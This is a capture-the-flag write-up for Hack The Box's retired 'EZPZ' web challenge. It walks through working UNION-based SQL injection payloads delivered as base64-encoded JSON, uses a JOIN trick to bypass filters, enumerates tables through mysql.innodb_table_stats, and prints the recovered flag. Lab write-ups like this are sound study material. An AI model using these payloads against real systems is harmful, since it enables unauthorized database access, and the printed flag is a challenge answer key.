EZPZ

Name: EZPZ
Hint: Can you get the flag?
Base Points: Easy - Retired [0]
Rated Difficulty:
xct
Creator: ahmed

Straight to the page and it looks like some errors exist and there is a hint at the bottom of the page source.

If we take those two things together, we should be able to come up with something like http://docker.hackthebox.eu:30855/?obj=id since that first error message is looking for an obj.  I do need to base64 encode the obj though.  So, let's try:

 

http://docker.hackthebox.eu:30855/?obj=d2hvYW1pJ3siSUQiOjF9Jw== to try and pull a whoami and addind ID:1.  Still have that ID error, so let's try dropping the whoami.  This might just be SQLi specific.

 

http://docker.hackthebox.eu:30855/?obj=eyJJRCI6MX0=

 

Bingo.  SQL statements it is.

Let's see what all we can pull from this by using a SELECT everything statement.  Best way to do this is to fire up Burp and make our encoding changes etc. there.  First I try

 

{"ID":"' UNION SELECT * from (SELECT 1)a JOIN (SELECT column_name from 'information_schema'.'columns')b#"}

 

and I get this error.

 

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, bool given in /var/www/html/index.php on line 34

 

So, that means we don't have access or can't see the table schema. Instead let's try

 

{"ID":"' UNION SELECT * from (SELECT 1)a JOIN (SELECT table_name from mysql.innodb_table_stats)b#"}

 

which of course encodes to http://docker.hackthebox.eu:30855/?obj=eyJJRCI6IicgVU5JT04gU0VMRUNUICogZnJvbSAoU0VMRUNUIDEpYSBKT0lOIChTRUxFQ1QgdGFibGVfbmFtZSBmcm9tIG15c3FsLmlubm9kYl90YWJsZV9zdGF0cyliIyJ9

Now we're getting somewhere.  We have a table.  Now we should be able to use a JOIN statement to display it.

 

{"ID":"' UNION SELECT * from (SELECT 1)a JOIN (SELECT * from FlagTableUnguessableEzPZ)b#"}

 

OR

 

http://docker.hackthebox.eu:30855/?obj=eyJJRCI6IicgVU5JT04gU0VMRUNUICogZnJvbSAoU0VMRUNUIDEpYSBKT0lOIChTRUxFQ1QgKiBmcm9tIEZsYWdUYWJsZVVuZ3Vlc3NhYmxlRXpQWiliIyJ9

 

And YAHTZEE!!  We have a flag.  HTB{T0oE4syP34syL4m3SQLiF!lt3rs}